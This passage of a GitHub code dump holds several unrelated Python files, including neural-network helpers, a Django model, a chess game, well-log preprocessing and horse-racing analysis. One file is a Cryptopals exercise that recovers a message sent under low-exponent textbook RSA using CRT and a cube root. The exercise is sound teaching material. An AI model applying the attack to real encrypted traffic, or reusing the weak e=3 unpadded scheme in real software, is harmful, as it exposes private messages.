function \n def map(self,func): \n for i in range(self.rows):\n for j in range(self.cols):\n val = self.matrix[i][j]\n self.matrix[i][j] = func(val)\n\n#a = Matrix(3,4,0)\n#b = Matrix(4,5,0)\n#print(a)\n#print(b)\n\n#Matrix.mult(a,b)\n\n#z = b.randomise()\n#print(z)\n\n#a.setitem(2,3,5.75)\n#print(a)\n#b.setitem(2,4,2)\n#print(b)\n#a.setitem(2,2,19)\n#print(a)\n\n#a = a.transpose()\n#print(a)\n\n#print(\"items of a :\")\n#print (a.getitem(2,2))\n#print(\"items of b :\")\n#print (b.getitem(2,2))\n\n#print(b.add_to_single_element(2,4,5))\n\n#c = Matrix(3,1,0)\n#d = Matrix(3,1,0)\n#print(c)\n#print(d)\n#z = Matrix.sub(c,d)\n#print(z)\n\n#z = a.pluse(1)\n#print(z)\n\n#y = a.add(b)\n#print(y)\n\n#c = a.multiplication(2)\n#print(c)\n#y = a.mul(b)\n#print(y)\n\n#array =[1,2,3]\n#print(array)\n#Matrix.fromArray(array)\n\n#Matrix.matrix_multiplication(a, b)\n#print(z)\n\n#b.map(sigmoid)\n#print(b)\n","repo_name":"desaiankit911/neural-network","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32785756917","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\n\n# Acknowledgements: https://github.com/wohlert/semi-supervised-pytorch\nclass Stochastic(nn.Module):\n \"\"\"\n Base stochastic layer that uses the reparametrization trick (Kingma and Welling, 2013) to draw a sample from a\n distribution parametrized by mu and log_var.\n \"\"\"\n\n def __init__(self):\n super(Stochastic, self).__init__()\n\n def reparametrize(self, mu, log_var):\n epsilon = Variable(torch.randn(mu.size()), requires_grad=False)\n\n if mu.is_cuda:\n epsilon = epsilon.to(mu.device)\n\n # log_std = 0.5 * log_var\n # std = exp(log_std)\n std = log_var.mul(0.5).exp_()\n\n # z = std * epsilon + mu\n z = mu.addcmul(std, epsilon)\n\n return z\n\n def forward(self, x):\n raise NotImplementedError\n\n\nclass GaussianSample(Stochastic):\n \"\"\"\n Layer that represents a sample from a Gaussian distribution.\n \"\"\"\n\n def __init__(self, in_features, out_features):\n super(GaussianSample, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n\n self.mu = nn.Linear(in_features, out_features)\n self.log_var = nn.Linear(in_features, out_features)\n\n def forward(self, x):\n mu = self.mu(x)\n log_var = F.softplus(self.log_var(x))\n return self.reparametrize(mu, log_var), mu, log_var\n","repo_name":"Minqi824/ADBench","sub_path":"adbench/baseline/DeepSAD/src/networks/layers/stochastic.py","file_name":"stochastic.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"75"} +{"seq_id":"1125691554","text":"import numpy as np\n\n\nclass RangeDict(dict):\n \"\"\"\n Custom dictionary class to use key ranges in the form of key[0] < item < key[1] as keys.\n \"\"\"\n\n def __getitem__(self, item):\n if not isinstance(item, tuple):\n for key in self:\n if key[0] < item < key[1]:\n return self[key]\n else:\n return super().__getitem__(item)\n\nif __name__ == '__main__':\n a = RangeDict({(0.1, 1): \"Test\"})\n print(a[0.5])","repo_name":"lkno0705/IndustrialApplicationsofAI","sub_path":"tertiary-sector/practical-finance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72109940083","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom .search import ThingIndex\n\n\nclass Things(models.Model):\n\n title = models.CharField(max_length=1000)\n description = models.CharField(max_length=4000)\n date_added = models.DateField(auto_now=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='things')\n image = models.ImageField(upload_to='things_pic', blank=True)\n\n # Method for indexing the model\n def indexing(self):\n obj = ThingIndex(\n meta={'id': self.id},\n user=self.user.username,\n date_added=self.date_added,\n title=self.title,\n image=self.image.url,\n description=self.description\n )\n obj.save()\n return obj.to_dict(include_meta=True)\n\n # Method for deleting the model\n def deleting(self):\n obj = ThingIndex(\n meta={'id': self.id},\n user=self.user.username,\n date_added=self.date_added,\n title=self.title,\n image=self.image.url,\n description=self.description\n )\n obj.delete()\n return obj.to_dict(include_meta=True)\n\n def __str__(self):\n # Built-in attribute of django.contrib.auth.models.User !\n return self.title\n\n\n'''\n@login_required\ndef AddNewThing(request):\n ThingsFormSet = modelformset_factory(Things, fields=('name', 'price', 'category'), extra=0)\n data = request.POST or None\n formset = ProductFormSet(data=data, queryset=Product.objects.filter(user=request.user))\n for form in formset:\n form.fields['category'].queryset = Category.objects.filter(user=request.user)\n\n if request.method == 'POST' and formset.is_valid():\n formset.save()\n return redirect('products_list')\n\n return render(request, 'products/products_formset.html', {'formset': formset})'''","repo_name":"jooya1/jooya","sub_path":"jooya/things/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28578201409","text":"from chess.items.board import *\nfrom chess.items.player import *\nfrom chess.items.peices import *\n\nclass new_game():\n def __init__(self, color):\n self.board = board()\n if color == 'white':\n pass\n self.white = player('white')\n self.black = player('black')\n\n def select_peice(self, color):\n while True:\n #select = input()\n select = 'D4'\n peice = self.white.ownership(select)\n if color == 'w':\n if peice == 'False':\n print(\"You Selected {} which is not your peice, try again: \".format(select))\n else:\n print(\"You selected the {} at {}\".format(peice.title, peice.position))\n return peice\n else:\n if peice == 'False':\n print(\"You Selected {} which is not your peice, try again: \".format(select))\n else:\n print(\"You selected the {} at {}\".format(peice.title, peice.position))\n return peice\n\n def on_board(self, location):\n if location in self.board.positions:\n return True\n else:\n return False\n\n def follows_rule(self, peice, location):\n if peice.position == location:\n return False\n return peice.rule(location, self.board)\n\n def change_location(self, peice, location):\n print(\"The {} at {} will move to {}\".format(peice.title, peice.position, location))\n peice.position = location\n print(\"The {} is now at {}\".format(peice.title, peice.position))\n\n def open_space(self, location):\n if (location in self.white.peices and self.white.turn) \\\n or (location in self.black.peices and self.black.turn):\n return False\n else:\n return True\n\n def r_shift(self, peice, location):\n up_down = False\n up = False\n left = False\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[1] == lreal[1]:\n up_down = True\n if rreal[0] > lreal[0]:\n up = True\n elif rreal[1] > lreal[1]:\n left = True\n\n if up:\n while rreal[0] != lreal[0]:\n rreal[0] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n\n elif up_down:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[0] != lreal[0]:\n rreal[0] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n elif left:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[1] != lreal[1]:\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n else:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[1] != lreal[1]:\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n\n def b_shift(self, peice, location):\n up_left = False\n up_right = False\n down_left = False\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[0] > lreal[0]:\n if rreal[1] > lreal[1]:\n up_left = True\n else:\n up_right = True\n elif rreal[1] > lreal[1]:\n down_left = True\n\n if up_left:\n while rreal != lreal:\n rreal[0] -= 1\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n elif up_right:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] -= 1\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n elif down_left:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] += 1\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n else:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] += 1\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n def p_shift(self, peice, location):\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if abs(rreal[1] - lreal[1]) == 1:\n return True\n else:\n if rreal[0] > lreal[0]:\n while rreal[0] != lreal[0]:\n rreal -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n else:\n while rreal[0] != lreal[0]:\n rreal += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n\n def K_shift(self, peice, location):\n if peice.owner == 'white':\n return False if location in self.white.peices else True\n else:\n return False if location in self.black.peices else True\n\n def q_shift(self, peice, location):\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[0] == lreal[0] or rreal[1] == lreal[1]:\n return self.r_shift(peice, location)\n else:\n return self.b_shift(peice, location)\n\n def blocked(self, peice, location):\n if peice.title == 'k':\n return True\n block_call = {\n \"R\": self.r_shift(peice, location),\n \"B\": self.b_shift(peice, location),\n \"K\": self.K_shift(peice, location),\n \"Q\": self.q_shift(peice, location),\n \"p\": self.p_shift(peice, location)\n }\n return block_call.get(peice.title)\n\n def move_to(self, peice, color):\n print(\"Enter the location you want to move {} to: \".format(peice.title))\n while True:\n location = input()\n #location = 'A4'\n if self.on_board(location) and self.open_space(location):\n if self.follows_rule(peice, location):\n if self.blocked(peice, location):\n self.change_location(peice, location)\n return peice\n else:\n print(\"Your {} is blocked\".format(peice.title))\n else:\n print(\"{} cant make that move\".format(peice.title))\n\n else:\n print(\"{} is not on the board. What the fuck you doing bro\".format(location))\n print(\"Pick again\")\n #check if blocked\n\n def game_flow(self):\n self.board.draw_board(self.white.peices, self.black.peices)\n if self.white.turn:\n print(\"whites turn, enter the peice you want to move: \")\n peice = self.select_peice('w')\n self.move_to(peice, 'w')\n self.board.draw_board(self.white.peices, self.black.peices)\n\n\n\n\n","repo_name":"RiskyClick/chess","sub_path":"logic/new_game.py","file_name":"new_game.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13464353018","text":"from .. import mod\nfrom .. import roots\nfrom .. import rsa\n\n\n# The secret message that we want to recover.\nPRIVATE_MESSAGE = int.from_bytes(b\"Hello this is a secret message.\", \"big\")\n\n\ndef add_padding(m, modulus_bits, padding_len):\n padding_bits = padding_len * 8\n padding = (1 << padding_bits) - 1 # [0xFF] * padding_len\n # Note: we keep first byte as 0x00 to ensure < modulus\n assert modulus_bits > 8 + padding_bits\n padding <<= modulus_bits - 8 - padding_bits\n assert m < padding\n return padding | m\nassert add_padding(0x42, modulus_bits=4*8, padding_len=2) == 0x00FFFF42\n\n\ndef remove_padding(padded_m, padding_len):\n padding_bits = padding_len * 8\n assert padded_m.bit_length() > padding_bits\n m_bits = padded_m.bit_length() - padding_bits\n mask = (1 << m_bits) - 1\n return padded_m & mask\nassert remove_padding(add_padding(0x42, modulus_bits=4*8, padding_len=2),\n padding_len=2) == 0x42\n\n\ndef capture_messages(e, bits=1024, padding_fn=None):\n \"\"\"Returns a list of 'e' (ciphertext, mudolus) pairs.\"\"\"\n m = PRIVATE_MESSAGE\n parties = [rsa.Rsa(e=e, bits=bits) for _ in range(e)]\n m = padding_fn(m) if padding_fn is not None else m\n return [(r.encrypt(m), r.n) for r in parties]\n\n\n# First of all, if p is small, we can directly recover it (it doesn't ever wrap\n# around N):\nprint(\"[*] Recovering m^3 for small m.\")\nprint(\" gen keys & encrypt...\")\nc = rsa.Rsa(e=3, bits=1024).encrypt(PRIVATE_MESSAGE)\nprint(\" cube root...\")\nassert roots.iroot(c, 3) == PRIVATE_MESSAGE\nprint(\" recovered!\")\n\n# If we add some static \"padding\" at the start, causing p^3 to wrap, we can\n# still recover p through CRT.\nprint(\"[*] Recovering m^3 for larger m, that wraps around N.\")\nstatic_pad = lambda m: add_padding(m, modulus_bits=1024, padding_len=3)\nprint(\" capturing 3 ciphertexts...\")\n((c_0, n_0), (c_1, n_1), (c_2, n_2)) = capture_messages(e=3, bits=1024,\n padding_fn=static_pad)\nprint(\" checking that cube root isn't sufficient...\")\nassert remove_padding(roots.iroot(c_0, 3), padding_len=3) != PRIVATE_MESSAGE\nprint(\" crt...\")\nc = mod.crt(residues=[c_0, c_1, c_2], moduli=[n_0, n_1, n_2])\nprint(\" cube root...\")\np = roots.iroot(c, 3)\nassert remove_padding(p, padding_len=3) == PRIVATE_MESSAGE\nprint(\" recovered!\")\n","repo_name":"JesseEmond/matasano-cryptopals","sub_path":"src/set_5/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"75"} +{"seq_id":"15026729386","text":"import os\nfrom string import ascii_letters\n\n\ndef get_rucksacks(lines: list[str]) -> list[tuple[str, str]]:\n line_gen = (line.strip() for line in lines)\n return [\n (line[: len(line) // 2], line[len(line) // 2 :]) # noqa: E203\n for line in line_gen\n ]\n\n\ndef group_rucksacks(\n rucksacks: list[tuple[str, str]], group_size=3\n) -> list[list[tuple[str, str]]]:\n res = []\n rucksacks = rucksacks.copy()\n while rucksacks:\n group = []\n for _ in range(0, group_size):\n if rucksacks:\n group.append(rucksacks.pop())\n res.append(group)\n return res\n\n\ndef shared_items(rucksack: tuple[str, str]) -> set[str]:\n first_compartment, second_compartment = rucksack\n return set(first_compartment).intersection(second_compartment)\n\n\ndef shared_group_items(rucksack_group: list[tuple[str, str]]):\n shared_items = set(ascii_letters)\n for rucksack in rucksack_group:\n first_compartment, second_compartment = rucksack\n shared_items.intersection_update(first_compartment + second_compartment)\n\n return shared_items\n\n\ndef item_value(item: str):\n return ascii_letters.index(item) + 1\n\n\ndef main():\n with open(os.path.dirname(__file__) + \"/input.txt\", \"r\") as f:\n lines = f.readlines()\n\n rucksacks = get_rucksacks(lines)\n shared_rucksack_items = [shared_items(rucksack) for rucksack in rucksacks]\n\n print(sum(map(lambda x: item_value(x.pop()), shared_rucksack_items)))\n\n grouped_rucksacks = group_rucksacks(rucksacks)\n\n print(\n sum(\n map(\n lambda x: item_value(x.pop()),\n (\n shared_group_items(rucksack_group)\n for rucksack_group in grouped_rucksacks\n ),\n )\n )\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jvllmr/adventofcode","sub_path":"2022/day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3183485060","text":"import os\nimport lasio\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom PIL import Image\n\ntrain_dir = '/media/Data-B/my_research/Geoscience_FL/data_well_log/las_files_Lithostrat_data/train'\nsave_dir = '/media/Data-B/my_research/Geoscience_FL/data_well_log/1D-image-SegLog_DN1/train'\n\nlog_curves = ['CALI', 'BS', 'DCAL', 'ROP', 'RDEP', 'RSHA', 'RMED', 'SP', 'DTS', 'DTC', 'NPHI', 'GR', 'RHOB', 'DRHO']\n\nlithology_numbers = {30000: 0,\n 65030: 1,\n 65000: 2,\n 80000: 3,\n 74000: 4,\n 70000: 5,\n 70032: 6,\n 88000: 7,\n 86000: 8,\n 99000: 9,\n 90000: 10,\n 93000: 11,\n 12345: 12}\n\n\ndef x_preprocessing(df):\n X = df.fillna(0)\n X = X[log_curves]\n X = X.apply(lambda x: (x - x.min()) / (x.max() - x.min()))\n X = X.fillna(0)\n return X\n\ndef df_to_tensor(X):\n # Get the total number of depth points (D) and number of log curves (N)\n D = len(X.index.values)\n N = len(X.columns)\n data = X.to_numpy()\n input_tensor = np.reshape(data, (D, N, 1))\n return input_tensor\n\ndef label_to_tensor(y):\n DL = len(y.index)\n NL = len(y.columns) - 1 # Exclude the label column\n C = 13 # Number of classes\n label_tensor = np.zeros((DL, NL, 13))\n print(label_tensor.shape)\n for i, row in enumerate(label_tensor):\n for j, val in enumerate(row):\n class_label = labels.iloc[i]\n label_tensor[i, j, class_label] = 1\n return label_tensor\n\nfor filename in tqdm(os.listdir(train_dir)):\n if filename.endswith('.las'):\n file_path = os.path.join(train_dir, filename)\n print(f'{file_path} is being processed...')\n las = lasio.read(f'{file_path}')\n df = las.df()\n\n # Preprocessing the log curve(input) data\n for curve in log_curves:\n if curve not in df.columns:\n df[curve] = 0\n \n X = x_preprocessing(df)\n input_tensor = df_to_tensor(X)\n input_tensor = (input_tensor * 255).astype(np.uint8)\n image = Image.fromarray(input_tensor[:, :, 0], mode='L')\n save_path = os.path.join(save_dir, 'x', f'{os.path.splitext(filename)[0]}.png')\n image.save(save_path)\n\n # Preprocessing labels\n labels = df['FORCE_2020_LITHOFACIES_LITHOLOGY'].fillna(12345).astype(int)\n labels = labels.replace(lithology_numbers)\n y = pd.concat([X, labels], axis=1)\n\n label_tensor = label_to_tensor(y)\n scaled_label_tensor = (label_tensor[:, :, 0] * 255).astype(np.uint8)\n\n # Convert to PIL image\n save_path_label = os.path.join(save_dir, 'y', f'{os.path.splitext(filename)[0]}.png')\n label_image = Image.fromarray(scaled_label_tensor, mode='L')\n label_image.save(save_path_label)\n\nprint('Preprocessing finished')\n\n\n","repo_name":"hyonbokan/lithology-identification-fl","sub_path":"data_trasform/1D-image-SegLog/las2img_seg_2.py","file_name":"las2img_seg_2.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36109894820","text":"class 技术路线类:\n def __init__(self, 名称, 数据, 锅炉额定产汽量 = 0, 额定制冷量 = 0):\n self.数据 = 数据\n self.名称 = 名称\n self.锅炉额定产汽量 = 锅炉额定产汽量\n self.额定制冷量 = 额定制冷量\n self.产蒸汽 = False\n self.制冷 = False\n if self.锅炉额定产汽量 > 0:\n self.产蒸汽 = True\n if self.额定制冷量 > 0:\n self.制冷 = True\n\n # 成员变量初始化\n self.投入产出量索引列表 = ['发电量', '产汽量', '制冷量', '自耗电量', '耗气量', '耗水量']\n self.设备实时量 = dict()\n self.设备全年量 = dict()\n for key in self.投入产出量索引列表:\n self.设备实时量[key] = [0] * 8760\n self.设备全年量[key] = 0\n\n self.实时单位产汽运行收益 = 0\n self.实时单位制冷运行收益 = 0\n self.设备实时量['单位产汽运行收益'] = [0] * 8760\n self.设备实时量['单位制冷运行收益'] = [0] * 8760\n\n self.设备价格 = 0\n self.发电机规模 = 0\n self.额定耗气量 = 0\n self.满负荷运行小时数 = 0\n self.发电效率 = 0\n self.余热锅炉装机规模 = 0\n self.溴冷机装机规模 = 0\n\n self.自耗电比例 = 0\n self.耗水率 = 0\n self.满负荷运行小时数限制 = 0\n self.单位制冷耗蒸汽量 = 0\n self.锅炉单位产汽耗电量 = 0\n self.单位制冷耗电量 = 0\n\n def 计算实时单位产汽运行收益(self, i):\n if self.产蒸汽 is True:\n 单位产汽燃气成本 = (self.额定耗气量 / self.锅炉额定产汽量) * self.数据.数据索引['燃气价格']\n 单位产汽自耗电成本 = ((self.发电机规模 / self.锅炉额定产汽量) * self.自耗电比例 + self.锅炉单位产汽耗电量) * self.数据.数据索引['用电价格'][i]\n 单位产汽水成本 = self.数据.数据索引['水价格'] * self.耗水率\n 单位产汽蒸汽收入 = self.数据.数据索引['蒸汽价格']\n 单位产汽供电收入 = (self.发电机规模 / self.锅炉额定产汽量) * self.数据.数据索引['供电价格'][i]\n 单位产汽运行收益 = 单位产汽蒸汽收入 + 单位产汽供电收入 - 单位产汽燃气成本 - 单位产汽自耗电成本 - 单位产汽水成本\n else:\n 单位产汽运行收益 = 0\n return 单位产汽运行收益\n\n def 计算实时单位制冷运行收益(self, i):\n if self.制冷 is True:\n if self.产蒸汽 is True:\n 单位制冷燃气成本 = (self.额定耗气量 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.数据.数据索引['燃气价格']\n 单位制冷供电收入 = (self.发电机规模 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.数据.数据索引['供电价格'][i]\n 单位制冷自耗电成本 = ((self.发电机规模 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.自耗电比例 + self.单位制冷耗电量) * self.数据.数据索引['用电价格'][i]\n else:\n 单位制冷燃气成本 = (self.额定耗气量 / self.额定制冷量) * self.数据.数据索引['燃气价格']\n 单位制冷自耗电成本 = ((self.发电机规模 / self.额定制冷量) * self.自耗电比例 + self.单位制冷耗电量) * self.数据.数据索引['用电价格'][i]\n 单位制冷供电收入 = (self.发电机规模 / self.额定制冷量) * self.数据.数据索引['供电价格'][i]\n\n 单位制冷水成本 = 0\n 单位制冷冷量收入 = self.数据.数据索引['供冷价格']\n 单位制冷运行收益 = 单位制冷冷量收入 + 单位制冷供电收入 - 单位制冷燃气成本 - 单位制冷自耗电成本 - 单位制冷水成本\n else:\n 单位制冷运行收益 = 0\n return 单位制冷运行收益\n\n def 计算实时量(self, i):\n if self.产蒸汽 is True:\n self.设备实时量['发电量'][i] = (self.设备实时量['产汽量'][i] / self.锅炉额定产汽量) * self.发电机规模\n self.设备实时量['自耗电量'][i] = self.设备实时量['发电量'][i] * self.自耗电比例 + self.设备实时量['产汽量'][i] * self.锅炉单位产汽耗电量\n self.设备实时量['耗气量'][i] = (self.设备实时量['产汽量'][i] / self.锅炉额定产汽量) * self.额定耗气量\n self.设备实时量['耗水量'][i] = self.设备实时量['产汽量'][i] * self.耗水率\n if self.产蒸汽 is False and self.制冷 is True:\n self.设备实时量['发电量'][i] = (self.设备实时量['制冷量'][i] / self.额定制冷量) * self.发电机规模\n self.设备实时量['自耗电量'][i] = self.设备实时量['发电量'][i] * self.自耗电比例 + self.设备实时量['制冷量'][i] * self.单位制冷耗电量\n self.设备实时量['耗气量'][i] = (self.设备实时量['制冷量'][i] / self.额定制冷量) * self.额定耗气量\n self.设备实时量['耗水量'][i] = 0\n\n","repo_name":"alex-kx/kxrepo","sub_path":"mysite-b4/moduletest/energysolution/Technology_base.py","file_name":"Technology_base.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26786443669","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\n\n\ndef get_data(file_path):\n df = pd.read_csv(file_path)\n return df\n\n\ndef numStr(num):\n if num >= 10:\n return str(num)\n else:\n return '0' + str(num)\n\n\nif __name__ == '__main__':\n ninki = []\n payback = []\n ninki_sum = []\n ninki_payback = []\n free_ninki = []\n free_ninki_sum = []\n free_ninki_payback = []\n free_data_num = 0\n grade_list = []\n baba_list = []\n\n data_num = 0\n y = [] # あたり率\n yNum = [] # 出現回数\n # for i in range(start, end):\n # for n in range(1, 13):\n for year in range(2020, 2021):\n for placeCode in range(1, 11):\n for kaisai in range(1, 8):\n for nitime in range(1, 13):\n for raceNum in range(1, 13):\n RACE_ID = str(year) + numStr(placeCode) + \\\n numStr(kaisai) + numStr(nitime) + \\\n numStr(raceNum)\n print(RACE_ID)\n try:\n tmp_data = get_data(\n \"Paybackcsv/\" + RACE_ID + \"_RaceInfo.csv\")\n g = tmp_data[\"レース\"].values[0]\n b = tmp_data[\"馬場\"].values[0]\n p = tmp_data[\"場所\"].values[0]\n # if \"G3\" in g or \"G2\" in g or \"G1\" in g:\n # if b == \"良\":\n path = \"Paybackcsv/\" + RACE_ID + \"_RaceResult.csv\"\n data = get_data(path)\n free_data_num += 1\n s = int(data.query('買い方 == \"三連複\"')\n [\"人気\"].values)\n d = int(data.query('買い方 == \"三連複\"')[\n \"払い戻し\"].values[0].replace(\",\", \"\"))\n z = int(data.query('買い方 == \"単勝\"')[\n \"払い戻し\"].values[0].replace(\",\", \"\"))\n l = int(data.query('買い方 == \"三連複\"')\n [\"人気\"].values)\n free_ninki.append(s)\n if s not in free_ninki_sum:\n free_ninki_sum.append(s)\n free_ninki_payback.append([s, d])\n for k1, n1 in enumerate(free_ninki_sum):\n if n1 == s:\n free_ninki_payback[k1][1] += d\n if (p == \"東京\" or p == \"札幌\" or p == \"阪神\") and b == \"良\":\n data_num += 1\n # s = int(data.query('買い方 == \"三連複\"')\n # [\"人気\"].values)\n # d = int(data.query('買い方 == \"三連複\"')[\n # \"払い戻し\"].values[0].replace(\",\", \"\"))\n ninki.append(s)\n if s not in ninki_sum:\n ninki_sum.append(s)\n ninki_payback.append([s, d])\n for k, n in enumerate(ninki_sum):\n if n == s:\n ninki_payback[k][1] += d\n except:\n import traceback\n traceback.print_exc()\n None\n print(free_data_num)\n print(data_num)\n # print(ninki)\n # print(payback)\n # print(ninki_sum)\n # print(ninki_payback)\n\n # 制限なし\n f_counter = Counter(free_ninki)\n f_count = f_counter.most_common() # N番目人気のあたり回数をカウント\n f_sorted_data = sorted(f_count, key=lambda x: x[0]) # N番目人気のあたり回数を人気純にそーと\n # N番目人気のあたり合計金額を人気順にそーと\n f_sorted_data2 = sorted(free_ninki_payback, key=lambda x: x[0])\n\n f_x = [f_x[0] for f_x in f_sorted_data] # N番目人気を横軸\n f_y1 = [f_y[1] for f_y in f_sorted_data] # N番目人気のあたり回数を縦軸\n f_y2 = [f_y[1] for f_y in f_sorted_data2] # N番目人気のあたり合計金額を縦軸\n f_y3 = np.array(f_y2)/np.array(f_y1) # N番目人気の平均あたり金額\n f_y4 = np.array([f_y[1] for f_y in f_sorted_data]) / \\\n free_data_num # N番目人気のあたり率\n f_y5 = np.array(f_y4)*np.array(f_y3) # N番目人気のあたり率*平均あたり金額\n\n f_y_sum = []\n f_y_pay_sum = []\n f_y_pay_out = []\n for i in range(1, 11):\n f_y_sum.append(sum(f_y1[:i*10])) # N*十番人気までのあたり回数\n f_y_pay_sum.append(sum(f_y2[:i*10])) # N*十番人気までのあたり金額\n f_y_pay_out.append(i*10)\n\n f_y6 = np.array(f_y_pay_sum)/np.array(f_y_sum) # N*10番目まで買った時のあたり平均金額\n f_y7 = np.array(f_y_sum)/free_data_num # N*10番目まで買った時のあたり率\n f_y8 = np.array(f_y7)*np.array(f_y6) # y番目人気まで買った時のあたり率*平均あたり金額\n f_y9 = np.array(f_y8)/np.array(f_y_pay_out) # あたり期待値/払う金額\n\n # なんらかのせいげんをつけた値\n\n counter = Counter(ninki)\n count = counter.most_common() # N番目人気のあたり回数をカウント\n sorted_data = sorted(count, key=lambda x: x[0]) # N番目人気のあたり回数を人気純にそーと\n # N番目人気のあたり合計金額を人気順にそーと\n sorted_data2 = sorted(ninki_payback, key=lambda x: x[0])\n\n x = [x[0] for x in sorted_data] # N番目人気を横軸\n y1 = [y[1] for y in sorted_data] # N番目人気のあたり回数を縦軸\n y2 = [y[1] for y in sorted_data2] # N番目人気のあたり合計金額を縦軸\n y3 = np.array(y2)/np.array(y1) # N番目人気の平均あたり金額\n y4 = np.array([y[1] for y in sorted_data])/data_num # N番目人気のあたり率\n y5 = np.array(y4)*np.array(y3) # N番目人気のあたり率*平均あたり金額\n\n y_sum = []\n y_pay_sum = []\n y_pay_out = []\n for i in range(1, 11):\n y_sum.append(sum(y1[:i*10])) # N*十番人気までのあたり回数\n y_pay_sum.append(sum(y2[:i*10])) # N*十番人気までのあたり金額\n y_pay_out.append(i*10)\n\n y6 = np.array(y_pay_sum)/np.array(y_sum) # N*10番目まで買った時のあたり平均金額\n y7 = np.array(y_sum)/data_num # N*10番目まで買った時のあたり率\n y8 = np.array(y7)*np.array(y6) # y番目人気まで買った時のあたり率*平均あたり金額\n y9 = np.array(y8)/np.array(y_pay_out) # あたり期待値/払う金額\n\n # plt.xticks(fontsize=8)\n print(y6)\n plt.bar(x[:10], width=-0.4, height=y8, align='edge')\n plt.bar(x[:10], width=0.4, height=f_y8, align='edge')\n\n # # plt.plot(x, y7)\n plt.show()\n","repo_name":"notitle420/Analyze_Keiba","sub_path":"NetkeibaAnalyzeBakenNinki.py","file_name":"NetkeibaAnalyzeBakenNinki.py","file_ext":"py","file_size_in_byte":7187,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17918527648","text":"file = open('smallsort.in', 'r')\nwrite_file = open('smallsort.out', 'w')\n\narr = list(map(int, file.readlines()[1].split()))\n\nN = len(arr)\n\nfor i in range(1, N):\n for j in range(i, 0, -1):\n if arr[j] < arr[j - 1]:\n arr[j], arr[j-1] = arr[j - 1], arr[j]\n else:\n break\n\narr = list(map(str, arr))\n\nwrite_file.write(' 